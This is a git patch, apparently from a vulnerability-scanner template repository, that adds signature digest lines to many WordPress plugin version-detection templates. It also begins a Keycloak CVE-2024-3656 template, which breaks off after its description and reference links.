4a0a00473045022066e7e5481d2403861355214caf66f75a16a7b7925da6803a3429db93bf6dc5ce022100f54bd85a6699a1f6c45ab4330f61fabab896eda205d195531893cf9c65a08e2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..a00cf91d3a 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f9d17113d8e677177fe11ca568507176de05f9cc24462e741cb1fd954f236f45022100d0a2dd584aad1ddc1f367313504f024ce470e59331e7bbc5693a1b53b4cf7b81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..05c57a0e9a 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022060fe418e50a9dbe7e6486ce4bc562e295ca0ec9c9f4e3c42be7eecee9803707102201c0eda712fb363a556bd9dfde8a26c3d38d2a734b3c5094c20e153e58b41d211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..61350d4a5b 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100960bc204fc9ff8d00b166f5059b358cf7fcce3966cab5d4ae088a698897016c0022038105344304afed2ff95b0a51053773e451d97dc74849f81a88e84723838e37a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..a37f8b3aa8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220197cfb7d0c6f1f99daadf7b2c4dd3935c0493a9c9f0e371c4e8e398334db3d7302210084908256e8f7ba3a68443f88c940908291c043d797cdb590e2abf63bfe0ec617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..1a82f6ee83 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100fd12022f7b2c0b5d1c580378235d103a499816a905b54af3ffae06edad852d6402210080fed3e786ce64cfa7793c765a86432e21c2fb3887cb82a9e0ebd82b8b2f47e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..38bd3b3f7a 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502203d127e01757889b97cd00bc2a794f657917486b73cae076abe2b59224567fb29022100e1309e80f17b8cd020f5eb416c717f68896a322f72a553e46abac1703c66f896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..411077e12a 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206513430b2c1fa539cb3b80fad0d1165f5c3f43c0fb694dff61d7eb945a23ca1b02203978d519173b3a55a2c8b30376255f144f063c675336ead55312199ac65f9343:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..606ef9f4f0 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e22a931a14954e25d290302dff4ee4c205bb8dc4153e065c1ed724fc610647b502202891cc07b36e05335920397b804d69fd1f5626556f762ef0ee4589794782f825:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..a9f52a71b6 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205d848ebfc333ae49ab0f7d6ba97953e79a00b5a5aace0ae186505bf4fcf3d6440220099c9721e2fc9b92e5cba5028f6c2a93d7efcd93e904d7b690bf59f039a5f852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..686a349ba3 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b7c7b5ee452beaa4a4397c3c0521c5bfadd8ffa930a16923d362f009d66b3d4a022100cf34a34b8c21e34308ba1e89d5161d43cc97ab3451ff788c466b7605e76107f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..e5aa56abc4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205c31a0eda8684a2587620643bac258a1e68dbf7e2a86b460222a188cc0abbee9022007fdaa2f412da8298156c7b17cfa00d624abdfe2000b92220e64594fb37a6761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..11f6c6474b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220268cafe7717a7862d0cf344bda5c282ad049f3dd84981ae7d23e49606490d3ef022100b860ba97dc2645b0edf289c620eddad194f1cc66e2b5ff24b6acc4b9fc5c1641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..f8d5d6181d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ba1cbb466b63df9bfa5bbae5ed56e73553d80c09c35341b5c2d4d9c21c32b0b9022021b8013e0f4f233ae3179398c03f4ee504db6398e42361ee8f64dc5be0a9b544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..2766c05035 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a90f59608c038ae1b1e39901813c96e1bd51c4c2afe9ab5067f092111d777a8602206c8624758d5818b146e6380c77394d8bac0dd66da7c5d74dad3ae932fb09ac33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..d8a9cd179c 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100a6b34ad75fdcf5316dfadc2c4f918b12fe134ff703a31357499e31089a15c3a902202b93180c100627bee00eb49d23284b4e24e71b1638465cfd7e71c75c82e5dea1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..c4d4244057 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a5460cac4c22179c90941fb107114246ebf73dd2364a6c37ee95212beada2c01022100cefee74aeb97b5814ddba52dbcaaf766707711e4645b8f5125e354725f8cdb73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..6d7ec22889 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022013cf5d6ca55ed1e09d446a54fc2efdcbaf76b2e73f1fcac1f58e5c040ee4fdff02201ac52471cd60a0df6a6cbba5fc1c3ac7916ad71cfaed17fc3346f05a272824e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..2c41d121b4 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100e1a4c4856b58c0d5dd42dea29542160a3295943db7698b116322e16aa18a872b022100b960823ef08c97874c6b7950ade5b00626e535a3a011eaaafd0bf2b6c14d13d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..a67e25ad6b 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100c8c38c918324abed1deb889814346be10dc4b014a1a92eb2c2dc50c37f57e44202206275c623b6fcd987f0136d56cce7cab93d1852a73dc7725051f699f35e12efc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..381e6ecaf3 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210088c5955837dc1b5e7e69d5a0687fecb3cb0dcf6b23447e3d86ff4ed13324374e02202b587b9e86093287481fcd7b9fe00857703d4ea75d5425f1f4d872b5caf089c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..5eafe78e85 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e9542d943a0fe0c4c27401d1a5a05356ed0018419a69324e86fd8a0fb98b9ad302202e716a1549ead7b6a40ce32deb413fa2dd4493985103c44d3cbac2af784543df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..c12d8c0566 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220547492df3d4273121630ae5ba38abbe01dd4c0ed7ae71c221e964d93ac560815022100ed623384c7692d0d9e5504f5cf0b87e2e1c316b7cf66897c99d0666125a7fcaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..25893f8186 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206076dce8f40a583418ba1639d52d22a5a47aa6c19fa6de08e74a7405fe200c1402204149e14f00c00278741b46df8c8cfeb717b6e2c109664a3f8f5081c65c01cbb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-logging.yaml b/http/technologies/wordpress/plugins/wp-mail-logging.yaml index 01a3669132..ec2091d0e2 100644 --- a/http/technologies/wordpress/plugins/wp-mail-logging.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-logging.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e0fc3592caf66f6a7ec3475662b7b8eef66727da2e2d02779c3618aa23cd6780022045468f90768642a1757432733e2741198160fb225f0171d5b7d1c2bae0acd762:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..1e87982c25 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c4b8bbf2acd993e18454f95e043aed2933639ff2a4ec19b8bb40ff44d001e781022100992eb3ab83610d1e4c5bf7752627dff99b5901e66591755ed711d4df45250192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index dc18db23b1..62f7ccc309 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b263e7779a32223731afa647188211733494225e53388266665b1562652144c9022066df19be42efef4bb25107d946891898a93fc8a6ce5a078aa4ddfb27055808bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..e132590a86 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402200d9191085cc38dfd6103e14ca13cb911127f584ab9f46a54c18e9cb3fd84a43002202548c5fe245954de4786d2e4726495a99e1a52fd3ce908bceaa7890ae3c3fe77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..3824cdd1b3 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 480a00453043022072b2053cb2ef70be07e1a1c12ca39199c93ce1a85d4c9f8c7e7d1c307845727f021f5e2ed5c5ce771ad449d8e72e727064fd99500f1ab3da3ebc98de80f4ff1c7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..a2d2f5dcab 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022068da174353f08b93f3c544bcf0709b02055eb5eba9b1c58b7dc23eb84949b69a02201547a8d6bfebd3cc0326cde538b9bf9f4b274b9ad434e257706a21ce09f9aa7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..33b617aab5 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450221009b1d97feb3e1375f653c0e90ac46e9c0b497801a177e8b00efe4214ad0fa092002204ec66f8a2a6cdc0d6c3b11aa219ca2af045c098b9ef7ee91a1b167647ba3d4a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..17cae7c4a8 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210099b6ffb74294f36183680d019ab8cd9bfde9675d6703ed0ab653d1f8abef37e3022048de0fe51d9365407dd70d8a83eb8c07e45b59813edae4bca0f4a0a981200c9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..7d6d0f01dc 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100994e83d1ed70d867f931c07d4a25834a881fd0081a848768ea6f36df3d53d457022016084e546ed9813b2713af9c12c7c55a338f99095bf2169760e34783e2d8fad9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..a415b9f357 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c73e115d94ba232edb87de1ecdfd9c398afa2a7c7cbf4ae907cc77c37be76e37022100d40b47f71014c2fde2a31955f707f52d0d07e832d24c15ea3097d341ebde7051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..9b4562fe05 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502202a936f892318e136f467a479dcad66fa4dd27d314ec3ac26261e3be5674816fb022100ee30b05deee2e5efd98af5ff00220216410742bef81444d27cc12a09052cb845:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..bcd7c76438 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100da7ce83ba3ce66e0d4f7822725a5b35b8cc1d516ca701e630170be50cef8cf3002210096f20a20401e9628867a3b842339200694f9101365bf65164237abb30ac06c3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..e5cfd07149 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022065d822f0a227d9ac823bf61b694fcb42522fbd636adcde19f9447475009181af022100fc4896f57fe03e699abd5ef938d1c755bdf162182ea4057735c17d2acc6925d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..d5b1dcbd6b 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022038fd186207146b9d27bb387da7c4269224fcaed909292ec3f528b63489a3bfd0022100f3005618a61486c281ec776fb6986f197c80d26dd7276bfd7babd83bb380701c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..0146291a63 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b1a4235a5e9af365d5419a0943355bbac9b2facf66f22849fc030b821b120aaa02203e6ef1a9391edfd1ba96bd837bbde9f30a84453cefd95eebd8b82f295d583455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..9196095510 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220573b5eecef5ee31cb6c8f6ce64b9e52c87b77e2e0091d1ef5fb0e1c116ad8b0002205bac6989ac2dc1f79620a92f47a02e8c8514610a8979b9502e023c220103fd5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..1e0a1278e7 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022049a58606330fd53f44bdfe2951052f0ae478468c28323dc10e9f6ef7e2aa0e7902203a7bfec9535a602ef7f3ab5bb3b39b2f25efd242f207636af320f65ac609df1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..c76ae069ad 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022044127a5547fc87b68f500f0d29ed93eb5038d06548b1f613dbdd0d6c4f0e1538022100d02bb738611b7a601ae42850f28468bc444205e75e5da425d2d39747cce9a2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..2d7d1585fa 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022078b492c871ce6912a5c19b1ef8ce8f5e3d3b17b088bbdcfbc87b2863ef61657c0221009cbcbe7b8b21b1600c166fed2efb6fc5033b2c1b424b61064432cf8ce6a719c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..a57ad08439 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206ae7a2f64ab2fbec3f1a31bfb80665df1614a90b20c258cfea9186b49c97f91b02202c4e6e85c0b1b24ccf98397215a8b8d03867ad27ce86e272a763928c57ffd5b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml index b53fbf8217..52dec1af5a 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-crm-sqli.yaml @@ -37,3 +37,5 @@ http: - type: status status: - 200 + +# digest: 4a0a00473045022100b1196597c35a5e36a3c31e02bc33def797fb8367fd547fd37d7a9253d9a97bc102202763e78faa636a9bbf8988ab1795122d96b17f94d92460971ea5ec1bdb2b676a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From eebb55cd46341743f1606647eefcca6ec3ce07fb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 18 Oct 2024 17:13:03 +0530 Subject: [PATCH 201/218] Create CVE-2024-3656.yaml --- http/cves/2024/CVE-2024-3656.yaml | 131 ++++++++++++++++++++++++++++++ 1 file changed, 131 insertions(+) create mode 100644 http/cves/2024/CVE-2024-3656.yaml diff --git a/http/cves/2024/CVE-2024-3656.yaml b/http/cves/2024/CVE-2024-3656.yaml new file mode 100644 index 0000000000..1870332c40 --- /dev/null +++ b/http/cves/2024/CVE-2024-3656.yaml @@ -0,0 +1,131 @@ +id: CVE-2024-3656 + +info: + name: Keycloak < 24.0.5 - Broken Access Control + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise. + reference: + - https://cn-sec.com/archives/3262467.html + - https://github.com/advisories/GHSA-2cww-fgmg-4jqc + - https://access.redhat.com/errata/RHSA-2024:3575 + - https://access.redhat.com/security/cve/CVE-2024-3656 + - 